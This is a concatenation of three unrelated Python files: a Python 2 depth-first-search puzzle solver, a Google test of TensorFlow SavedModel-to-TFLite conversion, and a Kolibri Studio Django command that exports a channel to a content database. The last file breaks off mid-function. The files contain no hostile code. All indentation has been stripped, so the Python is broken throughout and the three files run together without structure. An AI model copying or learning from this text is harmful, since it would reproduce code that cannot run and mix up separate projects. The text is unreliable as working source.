def solve(map_data):
hash_table = {}
node = [0]
def dfs(x, y, last_dir, path):
node[0] += 1
fill, is_continue = get_must_info(copy.deepcopy(map_use_dfs), x, y)
if 0 == fill:
return path
if not is_continue:
return 'no solution'
hash_code = hash_function(map_use_dfs, x, y)
if hash_code in hash_table:
return 'no solution'
hash_table[hash_code] = True
if -1 == last_dir:
dir_step = [0, 1, 2, 3]
else:
dir_step = [(last_dir + 5) % 4, (last_dir + 3) % 4]
for dir_enum in dir_step:
new_x, new_y = x + direct_vector[dir_enum]['x'], y + direct_vector[dir_enum]['y']
step_forward = 0
while is_empty(map_use_dfs, new_x, new_y):
step_forward += 1
new_x += direct_vector[dir_enum]['x']
new_y += direct_vector[dir_enum]['y']
new_x -= direct_vector[dir_enum]['x']
new_y -= direct_vector[dir_enum]['y']
# this direct is ok
if step_forward >= 1:
solution = dfs(new_x, new_y, dir_enum, path + direct[dir_enum])
if 'no solution' != solution:
return solution
step_x, step_y = x, y
for step_enum in range(step_forward):
step_x += direct_vector[dir_enum]['x']
step_y += direct_vector[dir_enum]['y']
map_use_dfs['map'][step_x][step_y] = True
return 'no solution'
response = {}
# handle the du = 1
du_1_vector = count_du_1(map_data)
for du_1_enum in du_1_vector:
x, y = du_1_enum[0], du_1_enum[1]
print 'first from point', x, y, 'start dfs'
map_use_dfs = copy.deepcopy(map_data)
map_use_dfs['map'][x][y] = False
solution = dfs(x, y, last_dir = -1, path = '')
if 'no solution' != solution:
response['x'] = x
response['y'] = y
response['path'] = solution
print 'this level run', node[0], 'node'
return response, node[0]
# dfs from everygrid
for i in range(map_data['x']):
for f in range(map_data['y']):
map_use_dfs = copy.deepcopy(map_data)
if not is_empty(map_use_dfs, i, f):
continue
solution = dfs(x = i, y = f, last_dir = -1, path = '')
if 'no solution' != solution:
response['x'] = i
response['y'] = f
response['path'] = solution
print 'this level run', node[0], 'node'
return response, node[0]
print 'this level run', node[0], 'node'
return 'no solution', node[0]
# get map data from stdin
def main(map_info):
map_data = parse_map(map_info)
start_time = time.time()
answer, node_num= solve(map_data)
print answer
print 'finish this level, cost', (time.time() - start_time), 's'
print 'per second calculate', node_num / (time.time() - start_time), 'node'
fd = open('answer', 'w')
fd.write('x=' + str(answer['x']) + '&y=' + str(answer['y']) + '&path=' + str(answer['path']))
fd.close()
return answer
| |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Test conversion from TensorFlow SavedModel to TFLite model."""
import collections
import tempfile
import typing
from absl.testing import absltest
from learner import test_data
from learner.brains import networks
from learner.brains import saved_model_to_tflite_model
from learner.brains import tfa_specs
import tensorflow as tf
from tf_agents.agents.behavioral_cloning import behavioral_cloning_agent
from tf_agents.policies import policy_saver
from tf_agents.trajectories import time_step as ts
# pylint: disable=g-bad-import-order
import common.generate_flatbuffers # pylint: disable=unused-import
from tflite import Model
from tflite import Tensor
from tflite import TensorType
class MockTensor(tf.Tensor):
def __init__(self, name):
self._name = name
@property
def name(self):
return self._name
MockTensorSpec = collections.namedtuple('MockTensorSpec', ['name'])
MockFunction = collections.namedtuple(
'MockFunction', ['inputs', 'structured_input_signature',
'outputs', 'structured_outputs'])
class SavedModelToTFLiteModelTest(absltest.TestCase):
"""Test saved_model_to_tflite_model."""
def save_model(self) -> str:
"""Create and save a model.
Returns:
Path to the directory containing the saved model.
"""
saved_model_path = tempfile.TemporaryDirectory().name
brain_spec = tfa_specs.BrainSpec(test_data.brain_spec())
agent = behavioral_cloning_agent.BehavioralCloningAgent(
ts.time_step_spec(brain_spec.observation_spec.tfa_spec),
brain_spec.action_spec.tfa_spec,
cloning_network=networks.FalkenNetwork(
brain_spec, {
'dropout': None,
'fc_layers': [32],
'feelers_version': 'v1'
}),
optimizer=None,
loss_fn=lambda *unused_args: None)
agent.initialize()
_ = agent.policy.variables()
policy_saver.PolicySaver(agent.policy, batch_size=1).save(saved_model_path)
return saved_model_path
def test_rename_tflite_tensors(self):
"""Test patching TF Lite FlatBuffer Tensors with a new names."""
tensor0 = Tensor.TensorT()
tensor0.name = 'foo_bar_0'.encode(
saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING)
tensor1 = Tensor.TensorT()
tensor1.name = 'bar_0_baz'.encode(
saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING)
tensor2 = Tensor.TensorT()
tensor2.name = 'bar_1_baz'.encode(
saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING)
saved_model_to_tflite_model._rename_tflite_tensors(
[tensor0, tensor1, tensor2], [0, 2],
{'foo_bar_0': '0/foo/bar/0',
'bar_1_baz': '0/bar/1/baz'})
self.assertEqual(tensor0.name.decode(
saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING), '0/foo/bar/0')
self.assertEqual(tensor1.name.decode(
saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING), 'bar_0_baz')
self.assertEqual(tensor2.name.decode(
saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING), '0/bar/1/baz')
def test_tf_tensor_name_to_tflite_name(self):
"""Test converting TF tensor names to TF lite tensor names."""
self.assertEqual(
saved_model_to_tflite_model._tf_tensor_name_to_tflite_name('foo_bar:0'),
'foo_bar')
self.assertEqual(
saved_model_to_tflite_model._tf_tensor_name_to_tflite_name('bar_baz:1'),
'bar_baz')
self.assertEqual(
saved_model_to_tflite_model._tf_tensor_name_to_tflite_name('a_tensor'),
'a_tensor')
def test_tf_tensor_spec_name_to_tensor_name(self):
"""Test converting TF tensor spec names to tensor argument names."""
self.assertEqual(
saved_model_to_tflite_model._tf_tensor_spec_name_to_tensor_name(
'0/foo/Bar/1/bazNumber'), 'foo_bar_1_baznumber')
self.assertEqual(
saved_model_to_tflite_model._tf_tensor_spec_name_to_tensor_name(
'magic/Stuff'), 'magic_stuff')
def test_create_tflite_to_tf_tensor_name_map(self):
"""Test creating a map of TF Lite to TF tensor spec name."""
input_map, output_map = (
saved_model_to_tflite_model._create_tflite_to_tf_tensor_name_map(
MockFunction(
inputs=[MockTensor('foo_0_bar:0'),
MockTensor('bish_0_bosh:0')],
structured_input_signature=(
[MockTensorSpec('0/foo/0/bar')],
{'0/bish/0/bosh': MockTensorSpec('0/bish/0/bosh')}
),
outputs=[MockTensor('identity_0:0'),
MockTensor('random_1:0')],
structured_outputs={
'action': {'turn_key': MockTensor('action/turn_key'),
'open_door': MockTensor('action/open_door')}})))
self.assertEqual(input_map, {'foo_0_bar': '0/foo/0/bar',
'bish_0_bosh': '0/bish/0/bosh'})
self.assertEqual(output_map, {'identity_0': 'action/open_door',
'random_1': 'action/turn_key'})
def test_create_tflite_to_tf_tensor_name_map_broken_function(self):
"""Fail with mismatched tensor spec to tensor name."""
with self.assertRaises(AssertionError):
saved_model_to_tflite_model._create_tflite_to_tf_tensor_name_map(
MockFunction(
inputs=[MockTensor('foo_0_bar'),
MockTensor('bish_0_bosh:0')],
structured_input_signature=(
[MockTensorSpec('0/foo/0/bar')],
{'0/bish/0/bosh': MockTensorSpec('0/bish/0/bosh')}
),
outputs=[], structured_outputs=[]))
def test_convert_saved_model(self):
"""Convert a saved model to TF Lite model."""
# Convert to a TFLite FlatBuffer.
tflite_flatbuffer = saved_model_to_tflite_model.convert(
self.save_model(), ['action'])
model = Model.ModelT.InitFromObj(
Model.Model.GetRootAsModel(tflite_flatbuffer, 0))
self.assertLen(model.subgraphs, 1)
subgraph = model.subgraphs[0]
inputs_and_outputs = []
for i in list(subgraph.inputs) + list(subgraph.outputs):
tensor = subgraph.tensors[i]
shape = tensor.shapeSignature if tensor.shapeSignature else tensor.shape
inputs_and_outputs.append((
tensor.name.decode(
saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING),
tensor.type, repr([d for d in shape])))
self.assertCountEqual(
inputs_and_outputs,
[('0/discount',
TensorType.TensorType.FLOAT32, '[1]'),
('0/observation/global_entities/0/position',
TensorType.TensorType.FLOAT32, '[1, 3]'),
('0/observation/global_entities/0/rotation',
TensorType.TensorType.FLOAT32, '[1, 4]'),
('0/observation/global_entities/1/position',
TensorType.TensorType.FLOAT32, '[1, 3]'),
('0/observation/global_entities/1/rotation',
TensorType.TensorType.FLOAT32, '[1, 4]'),
('0/observation/global_entities/2/drink',
TensorType.TensorType.INT32, '[1, 1]'),
('0/observation/global_entities/2/evilness',
TensorType.TensorType.FLOAT32, '[1, 1]'),
('0/observation/global_entities/2/position',
TensorType.TensorType.FLOAT32, '[1, 3]'),
('0/observation/global_entities/2/rotation',
TensorType.TensorType.FLOAT32, '[1, 4]'),
('0/observation/player/health',
TensorType.TensorType.FLOAT32, '[1, 1]'),
('0/observation/player/position',
TensorType.TensorType.FLOAT32, '[1, 3]'),
('0/observation/player/rotation',
TensorType.TensorType.FLOAT32, '[1, 4]'),
('0/observation/player/feeler',
TensorType.TensorType.FLOAT32, '[1, 3, 2]'),
('0/observation/camera/position',
TensorType.TensorType.FLOAT32, '[1, 3]'),
('0/observation/camera/rotation',
TensorType.TensorType.FLOAT32, '[1, 4]'),
('0/reward',
TensorType.TensorType.FLOAT32, '[1]'),
('0/step_type',
TensorType.TensorType.INT32, '[1]'),
('action/switch_weapon',
TensorType.TensorType.INT32, '[1, 1]'),
('action/throttle',
TensorType.TensorType.FLOAT32, '[1, 1]'),
('action/joy_pitch_yaw',
TensorType.TensorType.FLOAT32, '[1, 2]'),
('action/joy_xz',
TensorType.TensorType.FLOAT32, '[1, 2]'),
('action/joy_xz_world',
TensorType.TensorType.FLOAT32, '[1, 2]'),
])
def test_verify_function_output_order(self):
"""Verify the outputs of a tf.function.ConcreteFunction are sorted."""
# Outputs of tf_agents policies are dictionaries with each key indicating
# the name of the output (action) spec for the agent.
# http://cs/piper///depot/google3/third_party/py/tf_agents/policies/\
# policy_saver.py;l=603;rcl=314434347
# This dictionary (which is unsorted) is flattened and sorted when
# serialized by tf.function.ConcreteFunction._build_call_outputs().
# Expected input mapping from TFLite to TF inputs of the Lout module.
expected_input_map = {'player_drink_booze': 'player/drink/booze',
'player_drink_bubbles': 'player/drink/bubbles',
'player_drink_water': 'player/drink/water'}
# Test with all 2^N combinations of the following outputs.
outputs = ['action/player/chestpuff', 'action/player/bowl',
'action/player/stride', 'action/player/bluff',
'action/player/swing']
combinations = 2 ** len(outputs)
for combination in range(1, combinations):
selected = set()
offset = 0
bits = combination
while bits:
if bits & 1:
selected.add(outputs[offset])
offset += 1
bits >>= 1
class Lout(tf.Module):
"""Test module that provides a signature to serialize."""
def __init__(self, output_names: typing.Iterable[str], **kwargs):
"""Initialize the module to generate the specified set of outputs.
Args:
output_names: Set of outputs to generate.
**kwargs: Passed to tf.Module's initializer.
"""
self._output_names = tf.constant(list(output_names))
super(Lout, self).__init__(**kwargs)
@tf.function(input_signature=[
tf.TensorSpec((1,), dtype=tf.float32, name='player/drink/booze'),
tf.TensorSpec((1,), dtype=tf.float32, name='player/drink/water'),
tf.TensorSpec((1,), dtype=tf.int32, name='player/drink/bubbles'),
])
def __call__(self, ethanol, h2o,
carbonation) -> typing.Iterable[tf.Tensor]:
"""Generate a set of outputs.
The values of the outputs are _not_ used by the test case.
Args:
ethanol: Increases value of outputs.
h2o: Dilutes value of outputs.
carbonation: Modulates value of outputs.
Returns:
Dictionary of outputs whose names match _output_names.
"""
output_tensors = {}
for index, output in enumerate(self._output_names.numpy()):
output_tensors[output.decode()] = tf.identity(
(ethanol - h2o) * float(index % carbonation), name=output)
return output_tensors
# Call the function at least once to instance.
lout = Lout(selected, name=f'Lout{combination}')
_ = lout(tf.constant([0.2]), tf.constant([0.5]), tf.constant([5]))
with tempfile.TemporaryDirectory() as temp_name:
# Save and load the model to retrieve the graph signature.
tf.saved_model.save(lout, temp_name)
tf.keras.backend.clear_session()
model = tf.saved_model.load(temp_name)
graph = model.signatures['serving_default']
input_map, output_map = (
saved_model_to_tflite_model._create_tflite_to_tf_tensor_name_map(
graph))
# Output tensors should be sorted by tensor name.
expected_output_map = {}
for index, output in enumerate(sorted(selected)):
expected_output_map[f'Identity_{index}'
if index > 0 else 'Identity'] = output
self.assertCountEqual(input_map, expected_input_map)
self.assertCountEqual(output_map, expected_output_map)
if __name__ == '__main__':
absltest.main()
| |
import collections
import itertools
import json
import logging as logmodule
import os
import re
import sys
import tempfile
import uuid
import zipfile
from itertools import chain
from django.conf import settings
from django.core.files import File
from django.core.files.storage import default_storage as storage
from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import transaction
from django.db.models import Count
from django.db.models import Q
from django.db.models import Sum
from django.template.loader import render_to_string
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from kolibri.content.utils.search import fuzz
from kolibri_content import models as kolibrimodels
from kolibri_content.router import get_active_content_database
from kolibri_content.router import using_content_database
from le_utils.constants import content_kinds
from le_utils.constants import exercises
from le_utils.constants import file_formats
from le_utils.constants import format_presets
from le_utils.constants import roles
from contentcuration import models as ccmodels
from contentcuration.statistics import record_publish_stats
from contentcuration.utils.files import create_thumbnail_from_base64
from contentcuration.utils.files import get_thumbnail_encoding
from contentcuration.utils.parser import extract_value
from contentcuration.utils.parser import load_json_string
logmodule.basicConfig()
logging = logmodule.getLogger(__name__)
reload(sys)
sys.setdefaultencoding('utf8')
PERSEUS_IMG_DIR = exercises.IMG_PLACEHOLDER + "/images"
THUMBNAIL_DIMENSION = 128
MIN_SCHEMA_VERSION = "1"
class EarlyExit(BaseException):
def __init__(self, message, db_path):
self.message = message
self.db_path = db_path
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('channel_id', type=str)
parser.add_argument('--force', action='store_true', dest='force', default=False)
parser.add_argument('--user_id', dest='user_id', default=None)
parser.add_argument('--force-exercises', action='store_true', dest='force-exercises', default=False)
# optional argument to send an email to the user when done with exporting channel
parser.add_argument('--email', action='store_true', default=False)
def handle(self, *args, **options):
# license_id = options['license_id']
channel_id = options['channel_id']
force = options['force']
send_email = options['email']
user_id = options['user_id']
force_exercises = options['force-exercises']
channel = ccmodels.Channel.objects.get(pk=channel_id)
# license = ccmodels.License.objects.get(pk=license_id)
try:
create_content_database(channel_id, force, user_id, force_exercises)
increment_channel_version(channel)
mark_all_nodes_as_changed(channel)
add_tokens_to_channel(channel)
fill_published_fields(channel)
# Attributes not getting set for some reason, so just save it here
channel.main_tree.publishing = False
channel.main_tree.changed = False
channel.main_tree.published = True
channel.main_tree.save()
if send_email:
send_emails(channel, user_id)
# use SQLite backup API to put DB into archives folder.
# Then we can use the empty db name to have SQLite use a temporary DB (https://www.sqlite.org/inmemorydb.html)
record_publish_stats(channel)
except EarlyExit as e:
logging.warning("Exited early due to {message}.".format(message=e.message))
self.stdout.write("You can find your database in {path}".format(path=e.db_path))
# No matter what, make sure publishing is set to False once the run is done
finally:
channel.main_tree.publishing = False
channel.main_tree.save()
def send_emails(channel, user_id):
subject = render_to_string('registration/custom_email_subject.txt', {'subject': _('Kolibri Studio Channel Published')})
if user_id:
user = ccmodels.User.objects.get(pk=user_id)
message = render_to_string('registration/channel_published_email.txt', {'channel': channel, 'user': user})
user.email_user(subject, message, settings.DEFAULT_FROM_EMAIL, )
else:
# Email all users about updates to channel
for user in itertools.chain(channel.editors.all(), channel.viewers.all()):
message = render_to_string('registration/channel_published_email.txt', {'channel': channel, 'user': user})
user.email_user(subject, message, settings.DEFAULT_FROM_EMAIL, )
def create_content_database(channel_id, force, user_id, force_exercises):
channel = ccmodels.Channel.objects.get(pk=channel_id)
# increment the channel version
if not force:
raise_if_nodes_are_all_unchanged(channel)
fh, tempdb = tempfile.mkstemp(suffix=".sqlite3")
with using_content_database(tempdb):
channel.main_tree.publishing = True
channel.main_tree.save()
prepare_export_database(tempdb)
map_channel_to_kolibri_channel(channel)
map_content_nodes(channel.main_tree, channel.language, channel.id, channel.name, user_id=user_id, force_exercises=force_exercises)
map_prerequisites(channel.main_tree)
save_export_database(channel_id)
def create_kolibri_license_object(ccnode):
use_license_description = not ccnode.license.is_custom
return kolibrimodels.License.objects.get_or_create(
license_name=ccnode.license.license_name,
license_description=ccnode.license.license_description if use_license_description else ccnode.license_description
)
def increment_channel_version(channel):
channel.version += 1
channel.last_published = timezone.now()
channel.save()
def assign_license_to_contentcuration_nodes(channel, license):
channel.main_tree.get_family().update(license_id=license.pk)
def map_content_nodes(root_node, default_language, channel_id, channel_name, user_id=None, force_exercises=False):
# make sure we process nodes higher up in the tree first, or else when we
# make mappings the parent nodes might not be there
node_queue = collections.deque()
node_queue.append(root_node)
def queue_get_return_none_when_empty():
try:
return node_queue.popleft()
except IndexError:
return None
# kolibri_license = kolibrimodels.License.objects.get(license_name=license.license_name)
with transaction.atomic():
with ccmodels.ContentNode.objects.delay_mptt_updates():
for node in iter(queue_get_return_none_when_empty, None):
logging.debug("Mapping node with id {id}".format(
id=node.pk))
if node.get_descendants(include_self=True).exclude(kind_id=content_kinds.TOPIC).exists():
children = (node.children.all())
node_queue.extend(children)
kolibrinode = create_bare_contentnode(node, default_language, channel_id, channel_name)
if node.kind.kind == content_kinds.EXERCISE:
exercise_data = process_assessment_metadata(node, kolibrinode)
if force_exercises or node.changed or not node.files.filter(preset_id=format_presets.EXERCISE).exists():
create_perseus_exercise(node, kolibrinode, exercise_data, user_id=user_id)
create_associated_file_objects(kolibrinode, node)
map_tags_to_node(kolibrinode, node)
def create_bare_contentnode(ccnode, default_language, channel_id, channel_name):
logging.debug("Creating a Kolibri contentnode for instance id {}".format(
ccnode.node_id))
kolibri_license = None
if ccnode.license is not None:
kolibri_license = create_kolibri_license_object(ccnode)[0]
language = None
if ccnode.language or default_language:
language, _new = get_or_create_language(ccnode.language or default_language)
kolibrinode, is_new = kolibrimodels.ContentNode.objects.update_or_create(
pk=ccnode.node_id,
defaults={
'kind': ccnode.kind.kind,
'title': ccnode.title if ccnode.parent else channel_name,
'content_id': ccnode.content_id,
'channel_id': channel_id,
'author': ccnode.author or "",
'description': ccnode.description,
'sort_order': ccnode.sort_order,
'license_owner': ccnode.copyright_holder or "",
'license': kolibri_license,
'available': ccnode.get_descendants(include_self=True).exclude(kind_id=content_kinds.TOPIC).exists(), # Hide empty topics
'stemmed_metaphone': ' '.join(fuzz(ccnode.title + ' ' + ccnode.description)),
'lang': language,
'license_name': kolibri_license.license_name if kolibri_license is not None else None,
'license_description': kolibri_license.license_description if kolibri_license is not None else None,
'coach_content': ccnode.role_visibility == roles.COACH,
}
)
if ccnode.parent:
logging.debug("Associating {child} with parent {parent}".format(
child=kolibrinode.pk,
parent=ccnode.parent.node_id
))
kolibrinode.parent = kolibrimodels.ContentNode.objects.get(pk=ccnode.parent.node_id)
kolibrinode.save()
logging.debug("Created Kolibri ContentNode with node id {}".format(ccnode.node_id))
logging.debug("Kolibri node count: {}".format(kolibrimodels.ContentNode.objects.all().count()))
return kolibrinode
def get_or_create_language(language):
return kolibrimodels.Language.objects.get_or_create(
id=language.pk,
lang_code=language.lang_code,
lang_subcode=language.lang_subcode,
lang_name=language.lang_name if hasattr(language, 'lang_name') else language.native_name,
lang_direction=language.lang_direction
)
def create_associated_thumbnail(ccnode, ccfilemodel):
"""
Gets the appropriate thumbnail for export (uses or generates a base64 encoding)
Args:
ccnode (<ContentNode>): node to derive thumbnail from (if encoding is provided)
ccfilemodel (<File>): file to get thumbnail from if no encoding is available
Returns <File> model of encoded, resized thumbnail
"""
encoding = None
try:
encoding = ccnode.thumbnail_encoding and load_json_string(ccnode.thumbnail_encoding).get('base64')
except ValueError:
logging.error("ERROR: node thumbnail is not in correct format ({}: {})".format(ccnode.id, ccnode.thumbnail_encoding))
return
# Save the encoding if it doesn't already have an encoding
if not encoding:
try:
encoding = get_thumbnail_encoding(str(ccfilemodel))
except IOError:
# ImageMagick may raise an IOError if the file is not a thumbnail. Catch that then just return early.
logging.error("ERROR: cannot identify the thumbnail ({}: {})".format(ccnode.id, ccnode.thumbnail_encoding))
return
ccnode.thumbnail_encoding = json.dumps({
"base64": encoding,
"points": [],
"zoom": 0,
})
ccnode.save()
return create_thumbnail_from_base64(
encoding,
uploaded_by=ccfilemodel.uploaded_by,
file_format_id=ccfilemodel.file_format_id,
preset_id=ccfilemodel.preset_id
)
def create_associated_file_objects(kolibrinode, ccnode):
logging.debug("Creating LocalFile and File objects for Node {}".format(kolibrinode.id))
for ccfilemodel in ccnode.files.exclude(Q(preset_id=format_presets.EXERCISE_IMAGE) | Q(preset_id=format_presets.EXERCISE_GRAPHIE)):
preset = ccfilemodel.preset
fformat = ccfilemodel.file_format
if ccfilemodel.language:
get_or_create_language(ccfilemodel.language)
if preset.thumbnail:
ccfilemodel = create_associated_thumbnail(ccnode, ccfilemodel) or ccfilemodel
kolibrilocalfilemodel, new = kolibrimodels.LocalFile.objects.get_or_create(
pk=ccfilemodel.checksum,
defaults={
'extension': fformat.extension,
'file_size': ccfilemodel.file_size,
}
)
kolibrimodels.File.objects.create(
pk=ccfilemodel.pk,
checksum=ccfilemodel.checksum,
extension=fformat.extension,
available=True, # TODO: Set this to False, once we have availability stamping implemented in Kolibri
file_size=ccfilemodel.file_size,
contentnode=kolibrinode,
preset=preset.pk,
supplementary=preset.supplementary,
lang_id=ccfilemodel.language and ccfilemodel.language.pk,
thumbnail=preset.thumbnail,
priority=preset.order,
local_file=kolibrilocalfilemodel,
)
def create_perseus_exercise(ccnode, kolibrinode, exercise_data, user_id=None):
logging.debug("Creating Perseus Exercise for Node {}".format(ccnode.title))
filename = "{0}.{ext}".format(ccnode.title, ext=file_formats.PERSEUS)
temppath = None
try:
with tempfile.NamedTemporaryFile(suffix="zip", delete=False) as tempf:
temppath = tempf.name
create_perseus_zip(ccnode, exercise_data, tempf)
file_size = tempf.tell()
tempf.flush()
ccnode.files.filter(preset_id=format_presets.EXERCISE).delete()
assessment_file_obj = ccmodels.File.objects.create(
file_on_disk=File(open(temppath, 'r'), name=filename),
contentnode=ccnode,
file_format_id=file_formats.PERSEUS,
preset_id=format_presets.EXERCISE,
original_filename=filename,
file_size=file_size,
uploaded_by_id=user_id,
)
logging.debug("Created exercise for {0} with checksum {1}".format(ccnode.title, assessment_file_obj.checksum))
finally:
temppath and os.unlink(temppath)
def process_assessment_metadata(ccnode, kolibrinode):
# Get mastery model information, set to default if none provided
assessment_items = ccnode.assessment_items.all().order_by('order')
exercise_data = json.loads(ccnode.extra_fields) if ccnode.extra_fields else {}
randomize = exercise_data.get('randomize') if exercise_data.get('randomize') is not None else True
assessment_item_ids = [a.assessment_id for a in assessment_items]
mastery_model = {'type': exercise_data.get('mastery_model') or exercises.M_OF_N}
if mastery_model['type'] == exercises.M_OF_N:
mastery_model.update({'n': exercise_data.get('n') or min(5, assessment_items.count()) or 1})
mastery_model.update({'m': exercise_data.get('m') or min(5, assessment_items.count()) or 1})
elif mastery_model['type'] == exercises.DO_ALL:
mastery_model.update({'n': assessment_items.count() or 1, 'm': assessment_items.count() or 1})
elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_2:
mastery_model.update({'n': 2, 'm': 2})
elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_3:
mastery_model.update({'n': 3, 'm': 3})
elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_5:
mastery_model.update({'n': 5, 'm': 5})
elif mastery_model['type'] == exercises.NUM_CORRECT_IN_A_ROW_10:
mastery_model.update({'n': 10, 'm': 10})
exercise_data.update({
'mastery_model': exercises.M_OF_N,
'legacy_mastery_model': mastery_model['type'],
'randomize': randomize,
'n': mastery_model.get('n'),
'm': mastery_model.get('m'),
'all_assessment_items': assessment_item_ids,
'assessment_mapping': {a.assessment_id: a.type if a.type != 'true_false' else exercises.SINGLE_SELECTION.decode('utf-8') for a in assessment_items},
})
kolibrimodels.AssessmentMetaData.objects.create(
id=uuid.uuid4(),
contentnode=kolibrinode,
assessment_item_ids=json.dumps(assessment_item_ids),
number_of_assessments=assessment_items.count(),
mastery_model=json.dumps(mastery_model),
randomize=randomize,
is_manipulable=ccnode.kind_id == content_kinds.EXERCISE,
)
return exercise_data
def create_perseus_zip(ccnode, exercise_data, write_to_path):
with zipfile.ZipFile(write_to_path, "w") as zf:
try:
exercise_context = {
'exercise': json.dumps(exercise_data, sort_keys=True, indent=4)
}
exercise_result = render_to_string('perseus/exercise.json', exercise_context)
write_to_zipfile("exercise.json", exercise_result, zf)
for question in ccnode.assessment_items.prefetch_related('files').all().order_by('order'):
try:
for image in question.files.filter(preset_id=format_presets.EXERCISE_IMAGE).order_by('checksum'):
image_name = "images/{}.{}".format(image.checksum, image.file_format_id)
if image_name not in zf.namelist():
with storage.open(ccmodels.generate_object_storage_name(image.checksum, str(image)), 'rb') as content:
write_to_zipfile(image_name, content.read(), zf)
for image in question.files.filter(preset_id=format_presets.EXERCISE_GRAPHIE).order_by('checksum'):
svg_name = "images/{0}.svg".format(image.original_filename)
json_name = "images/{0}-data.json".format(image.original_filename)
if svg_name not in zf.namelist() or json_name not in zf.namelist():
with storage.open(ccmodels.generate_object_storage_name(image.checksum, str(image)), 'rb') as content:
content = content.read()
content = content.split(exercises.GRAPHIE_DELIMITER)
write_to_zipfile(svg_name, content[0], zf)
write_to_zipfile(json_name, content[1], zf)
write_assessment_item(question, zf)
except Exception as e:
logging.error("Publishing error: {}".format(str(e)))
finally:
zf.close()
def write_to_zipfile(filename, content, zf):
info = zipfile.ZipInfo(filename, date_time=(2013, 3, 14, 1, 59, 26))
info.comment = "Perseus file generated during export process".encode()
info.compress_type = zipfile.ZIP_STORED
info.create_system = 0
zf.writestr(info, content)
def write_assessment_item(assessment_item, zf):
if assessment_item.type == exercises.MULTIPLE_SELECTION:
template = 'perseus/multiple_selection.json'
elif assessment_item.type == exercises.SINGLE_SELECTION or assessment_item.type == 'true_false':
template = 'perseus/multiple_selection.json'
elif assessment_item.type == exercises.INPUT_QUESTION:
template = 'perseus/input_question.json'
elif assessment_item.type == exercises.PERSEUS_QUESTION:
template = 'perseus/perseus_question.json'
else:
raise TypeError("Unrecognized question type on item {}".format(assessment_item.assessment_id))
question = process_formulas(assessment_item.question)
question, question_images = process_image_strings(question, zf)
answer_data = json.loads(assessment_item.answers)
for answer in answer_data:
if assessment_item.type == exercises.INPUT_QUESTION:
answer['answer'] = extract_value(answer['answer'])
else:
answer['answer'] = answer['answer'].replace(exercises.CONTENT_STORAGE_PLACEHOLDER, PERSEUS_IMG_DIR)
answer['answer'] = process_formulas(answer['answer'])
# In case perseus doesn't support =wxh syntax, use below code
answer['answer'], answer_images = process_image_strings(answer['answer'], zf)
answer.update({'images': answer_images})
answer_data = list(filter(lambda a: a['answer'] or a['answer'] == 0, answer_data)) # Filter out empty answers, but not 0
hint_data = json.loads(assessment_item.hints)
for hint in hint_data:
hint['hint'] = process_formulas(hint['hint'])
hint['hint'], hint_images = process_image_strings(hint['hint'], zf)
hint.update({'images': hint_images})
context = {
'question': question,
'question_images': question_images,
'answers': sorted(answer_data, lambda x, y: cmp(x.get('order'), y.get('order'))),
'multiple_select': assessment_item.type == exercises.MULTIPLE_SELECTION,
'raw_data': assessment_item.raw_data.replace(exercises.CONTENT_STORAGE_PLACEHOLDER, PERSEUS_IMG_DIR),
'hints': sorted(hint_data, lambda x, y: cmp(x.get('order'), y.get('order'))),
'randomize': assessment_item.randomize,
}
result = render_to_string(template, context).encode('utf-8', "ignore")
write_to_zipfile("{0}.json".format(assessment_item.assessment_id), result, zf)
def process_formulas(content):
for match in re.finditer(ur'\$(\$.+\$)\$', content):
content = content.replace(match.group(0), match.group(1))
return content
def process_image_strings(content, zf):
image_list = []
content = content.replace(exercises.CONTENT_STORAGE_PLACEHOLDER, PERSEUS_IMG_DIR)
for match in re.finditer(ur'!\[(?:[^\]]*)]\(([^\)]+)\)', content):
img_match = re.search(ur'(.+/images/[^\s]+)(?:\s=([0-9\.]+)x([0-9\.]+))*', match.group(1))
if img_match:
# Add any image files that haven't been written to the zipfile
filename = img_match.group(1).split('/')[-1]
checksum, ext = os.path.splitext(filename)
image_name = "images/{}.{}".format(checksum, ext[1:])
if image_name not in zf.namelist():
with storage.open(ccmodels.generate_object_storage_name(checksum, filename), 'rb') as imgfile:
write_to_zipfile(image_name, imgfile.read(), zf)
# Add resizing data
if img_match.group(2) and img_match.group(3):
image_data = {'name': img_match.group(1)}
image_data.update({'width': float(img_match.group(2))})
image_data.update({'height': float(img_match.group(3))})
image_list.append(image_data)
content = content.replace(match.group(1), img_match.group(1))
return content, image_list
def map_prerequisites(root_node):
for n in ccmodels.PrerequisiteContentRelationship.objects.filter(prerequisite__tree_id=root_node.tree_id)\
.values('prerequisite__node_id', 'target_node__node_id'):
target_node = kolibrimodels.ContentNode.objects.get(pk=n['target_node__node_id'])
target_node.has_prerequisite.add(n['prerequisite__node_id'])
def map_channel_to_kolibri_channel(channel):
logging.debug("Generating the channel metadata.")
channel.icon_encoding = convert_channel_thumbnail(channel)
channel.save()
kolibri_channel = kolibrimodels.ChannelMetadata.objects.create(
id=channel.id,
name=channel.name,
description=channel.description,
version=channel.version + 1, # Need to save as version being published, not current version
thumbnail=channel.icon_encoding,
root_pk=channel.main_tree.node_id,
root_id=channel.main_tree.node_id,
min_schema_version=MIN_SCHEMA_VERSION, # Need to modify Kolibri so we can import this without importing models
)
logging.info("Generated the channel metadata.")
return kolibri_channel
def convert_channel_thumbnail(channel):
""" encode_thumbnail: gets base64 encoding of thumbnail
Args:
thumbnail (str): file path or url to channel's thumbnail
